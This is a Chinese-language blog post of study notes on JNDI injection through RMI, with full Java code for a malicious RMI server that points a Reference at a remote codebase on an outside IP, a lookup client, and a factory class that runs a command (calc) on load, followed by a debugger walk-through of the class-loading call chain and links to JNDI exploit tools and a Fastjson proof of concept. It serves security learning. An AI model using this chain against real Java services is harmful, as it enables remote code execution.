JNDI注入学习笔记

最新推荐文章于 2024-09-17 07:00:00 发布
最新推荐文章于 2024-09-17 07:00:00 发布
阅读量4.2k 收藏 2
点赞数 1
分类专栏: 基础知识 Java 文章标签: java 安全 json
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cjdgg/article/details/123734296
版权

JNDI注入学习笔记

前言

前面我们知道了RMI的一些机制,今天我们来学一学JNDI注入

什么是JNDI

jndi的全称为Java Naming and Directory Interface(java命名和目录接口)SUN公司提供的一种标准的Java命名系统接口,JNDI提供统一的客户端API,通过不同的服务供应接口(SPI)的实现,由管理者将JNDI API映射为特定的命名服务和目录系统,使得Java应用程序可以和这些命名服务和目录服务之间进行交互、如图
在这里插入图片描述
我们只要知道jndi是对各种访问目录服务的逻辑进行了再封装,也就是以前我们访问rmi与ldap要写的代码差别很大,但是有了jndi这一层,我们就可以用jndi的方式来轻松访问rmi或者ldap服务,这样访问不同的服务的代码实现基本是一样的。

在这里插入图片描述
在JNDI中提供了绑定和查找的方法:

bind:将名称绑定到对象中;
lookup:通过名字检索执行的对象

References和ReferenceWrapper

Reference类表示对存在于命名/目录系统以外的对象的引用,因此通过RMI进行JNDI注入,攻击者构造的恶意RMI服务器向客户端返回一个Reference对象,Reference对象中指定从远程加载构造的恶意Factory类,客户端在进行lookup的时候,会从远程动态加载攻击者构造的恶意Factory类并实例化,攻击者可以在构造方法或者是静态代码等地方加入恶意代码。

javax.naming.Reference构造方法为:

Reference(String className, String factory, String factoryLocation),

className - 远程加载时所使用的类名
classFactory - 加载的class中需要实例化类的名称
classFactoryLocation - 提供classes数据的地址可以是file/ftp/http等协议

因为Reference没有实现Remote接口也没有继承UnicastRemoteObject类,故不能作为远程对象bind到注册中心,所以需要使用ReferenceWrapper对Reference的实例进行一个封装。

RMI-JNDI注入

package JNDI_Inesrct;

import com.sun.jndi.rmi.registry.ReferenceWrapper;

import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class Server {
    public static void main(String[] args) throws Exception {
        Registry registry = LocateRegistry.createRegistry(1099);
        Reference aa = new Reference("Calc", "Calc", "http://42.193.22.50:1234/");
        ReferenceWrapper refObjWrapper = new ReferenceWrapper(aa);
        registry.bind("hello", refObjWrapper);
    }
}

package JNDI_Inesrct;

import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;

public class Client {
    public static void main(String[] args) throws NamingException {
        String uri = "rmi://127.0.0.1:1099/hello";
        Context ctx = new InitialContext();
        ctx.lookup(uri);
    }
}

import java.io.IOException;
import java.lang.Runtime;
import java.lang.Process;
import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.util.Hashtable;

public class Calc implements ObjectFactory {
    {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"calc"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }

    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"calc"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public Calc() throws Exception {
        Runtime rt = Runtime.getRuntime();
        String[] commands = {"calc"};
        Process pc = rt.exec(commands);
        pc.waitFor();
    }

    @Override
    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
        Runtime rt = Runtime.getRuntime();
        String[] commands = {"calc"};
        Process pc = rt.exec(commands);
        pc.waitFor();
        return null;
    }
}

这里的Calc.java要把它编译成class文件,然后放到自己的云服务器上。该恶意代码一共会弹4次计算器。

下面开始分析下它的流程,先看看整体调用栈
在这里插入图片描述
那我们开始分析下,前面几个lookup就不看了,是获取上下文信息的,主要讲后面的关键几步,我们从decodeObject开始看
在这里插入图片描述
这里是将从服务端返回的ReferenceWrapper_Stub存根传入该函数
在这里插入图片描述
这里利用ReferenceWrapper_Stub执行getReference()获得了一个Reference对象

接着我们跟入getObjectInstance(),此处为获取Factory类的实例。
在这里插入图片描述
319行这里调用了getObjectFactoryFromReference(),我们跟进getObjectFactoryFromReference()
在这里插入图片描述
146行处clas = helper.loadClass(factoryName);尝试从本地加载Factory类,如果本地不存在此类,158行处则会从codebase中加载:clas = helper.loadClass(factoryName, codebase),从远程加载我们恶意class

我们跟进158行的loadclass看看
在这里插入图片描述
可以看到他是通过URLClassLoader从远程动态加载我们的恶意类。
继续跟入loadclass()
在这里插入图片描述
这里调用了forname,就会加载这个类,从而执行到static方法可以进行第一次命令执行。

继续调式回到getObjectFactoryFromReference()
在这里插入图片描述
在return那里return (clas != null) ? (ObjectFactory) clas.newInstance() : null;对我们的恶意类进行一个实例化,这里执行完就会调用代码块和无参构造方法,弹出两个计算器

在这里插入图片描述
继续执行会调用getObjectInstance方法,这里还会弹出一个计算器
在这里插入图片描述

总结

上面的例子有两处源代码可被我们直接利用,我们主要是通过上面的调试,体会一下利用JNDI注入通过Reference加载远程的Factory类的流程,更方面于我们理解上面提到的知识点。而LDAP相关的攻击和RMI差不多,感兴趣的可以看看下面的参考文章有提到

调用链

lookup->decodeObject->getObjectFactoryFromReference->getObjectFactoryFromReference->loadclass->URLClassLoader.newInstance->loadclass->forname

lookup->decodeObject->getObjectFactoryFromReference->getObjectFactoryFromReference->loadclass->URLClassLoader.newInstance->loadclass->forname->newInstance()

参考文章
https://blog.csdn.net/u011479200/article/details/108246846
https://www.cnblogs.com/yyhuni/p/15083613.html
https://xz.aliyun.com/t/8214

lmonstergg
关注
专栏目录
JNDI注入(RMI攻击实现和LDAP攻击实现)
weixin_45682070的博客
12-12 9604
0x01 JNDI 概述 JNDIJava Naming and Directory Interface(JAVA命名和目录接口)的英文简写,它是为JAVA应用程序提供命名和目录访问服务的API(Application Programing Interface,应用程序编程接口) 简单一点理解就是:JNDI的做法,就是定义一个数据源,与系统外部的资源的引用 都可以通过JNDI定义和引用 JNDI可访问的现有的目录及服务有: DNS、XNam 、Novell目录服务、LDAP(Lightweight Dir
Log4j2的JNDI注入漏洞原理分析与思考
m0_69745415的博客
05-05 473
因为存在前身Log4j,而且都是Apache下的项目,不管是jar包名称还是package名称,看起来都很相似,导致有些人分不清自己用的是Log4j还是Log4j2。这里给出几个辨别方法: Log4j2分为2个jar包,一个是接口 log4j-api-版本号.jar ,一个是具体实现 log4j−core−{版本号}.jar ,一个是具体实现 log4j-core-版本号.jar ,一个是具体实现 log4j−core−{版本号}.j
JNDI注入
Christ1na的博客
11-17 807
JNDI(The Java Naming and Directory Interface,Java命名和目录接口)是一组在Java应用中访问命名和目录服务的API,命名服务将名称和对象联系起来,使得我们可以用名称访问对象。
Fastjson反序列化漏洞——JNDI注入
最新发布
2301_79096184的博客
09-17 1837
JNDI注入
安全技术系列之JNDI注入
好记性不如烂笔头
09-28 5791
JDNI注入总结
[Java安全]—JNDI注入
Sentiment的博客
07-08 2683
文章首发于Secin:浅析JNDI注入其实应该先学JNDI再学fastjson的,但是JNDI投稿去了,所以就先发了fastjsonTrail: Java Naming and Directory Interface (The Java™ Tutorials) (oracle.com)The JNDI Tutorial (oracle.com)JNDI (Java Naming and Directory Interface) 是一个应用程序设计的 API,为开发人员提供了查找和访问各种命名和目录服务的通用
Tomcat学习笔记 - 【使用JNDI数据源】
08-07
【标题】"Tomcat学习笔记 - 使用JNDI数据源" 在Java应用服务器如Tomcat中,使用JNDIJava Naming and Directory Interface)数据源是一种标准的方式,它允许我们集中管理和配置数据库连接,提高应用的可移植性和可...
javaEE学习笔记
03-04
学习笔记涵盖了JavaEE的核心技术,帮助学习者深入理解和掌握javaweb的各项技能。 1. **Servlet与JSP** - **Servlet**:Servlet是Java编写的服务器端程序,主要用于扩展服务器的功能。在JavaEE中,Servlet处理...
JDBC 实战教程-尚硅谷学习笔记 ,2022版
03-24
**JDBC实战教程-尚硅谷学习笔记 2022版** Java Database Connectivity(JDBC)是Java语言中用于与数据库交互的一种接口,由Sun Microsystems公司开发并纳入Java标准库,使得Java程序员能够以标准化的方式来访问各种...
Web安全学习笔记.pdf
10-22
《Web安全学习笔记》是一份全面介绍Web安全的资料,涵盖了从基础知识到深入技术的多个层面。本笔记首先概述了Web技术的演进历程及其安全挑战的发展,强调了网络安全的重要性。接下来,它深入探讨了计算机网络的基础...
JNDI-Injection-Exploit:JNDI注入测试工具(生成JNDI链接的工具可以启动多个服务器来利用JNDI Injection漏洞,例如Jackson,Fastjson等)
05-07
JNDI注入漏洞 描述 JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器和LDAP服务器基于并进行了进一步修改以与HTTP服务器链接。 使用此工具可以获取JNDI链接,可以将这些链接插入POC以测试漏洞。 例如,这是一个Fastjson vul-poc: { " @type " : " com.sun.rowset.JdbcRowSetImpl " , " dataSourceName " : " rmi://127.0.0.1:1099/Object " , " autoCommit " : true } 我们可以用JNDI-Injection-Exploit生成的链接替换“ rmi://127.0.0.1:1099 / Object”,以测试漏洞。 免责声明 所有信
JNDI:JNDI注入利用工具
03-21
JNDI注入利用工具 介绍 本项目为JNDI注入利用工具,生成JNDI连接并启动初始化相关服务,可用于Fastjson,Jackson等相关突破的验证。 本项目是基于welk1n的 ,在此项目的基础服务框架上,重新编写了攻击利用代码,支持更多更强大的功能,并加入了多种方式进行回显的支持。 QAQ 功能 本工具支持了利用JNDI注入构造多种恶意负载,其中包括: 名称 功能 简介 基本信息 获取服务器基础信息 打印出System.getProperties()中的信息 命令 命令执行 反射调用forkandexec执行命令 数据源黑客 获取Spring DataSource明文 获取缓存在某些中的数据源 目录列表 目录遍历 使用File对象列目录 FileDelete 文件删除 使用File对象删除文件 文件读取 文件读取 使用FileInputStream读取文件 文件写入 文件写入 使用
Java技术回顾之JNDIJNDI API
EricXYY Memo
01-05 1868
JNDI API包含以下5个package:javax.naming javax.naming.directory javax.naming.event javax.naming.ldap javax.naming.spi 其中前面4个package定义了JNDI客户端接口,面向使用命名和目录服务的应用。最后的javax.naming.spi定义了JNDI服务提供者接口(SPI),面向不同的命名和
Javaweb安全——JNDI注入
weixin_43610673的博客
07-21 1457
测试环境为JDK8u111以及8u211JavaNamingandDirectoryInterface(JNDI)是一个和JDBC、LDAP、RMI、DNS。名称与对象相关联的方法,例如地址、标识符或计算机程序通常使用的对象。目录服务是命名服务的扩展,除了提供名称和对象的关联,。在一个实际的名称服务中,有些对象可能无法直接存储在系统内,而是以引用的形式进行存储。引用包含了如何访问实际对象的信息。对象工厂是对象的生产者。它接受有关如何创建对象的一些信息,例如引用,然后返回该对象的实例。的错误。...
JNDI注入基础
洋洋的小黑屋
07-28 255
一、简介 JNDI(The Java Naming and Directory Interface,Java命名和目录接口)是一组在Java应用中访问命名和目录服务的API,命名服务将名称和对象联系起来,使得我们可以用名称访问对象。 这些命名/目录服务提供者: RMI (JAVA远程方法调用) LDAP (轻量级目录访问协议) CORBA (公共对象请求代理体系结构) DNS (域名服务) 二、利用方式 在JNDI中有几种利用方式,这节就来讲一下RMI的利用方式 1.RMI的利用方式 客户端: pack
JNDI注入详解
m0_60571990的博客
03-02 4323
JNDI注入详解
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值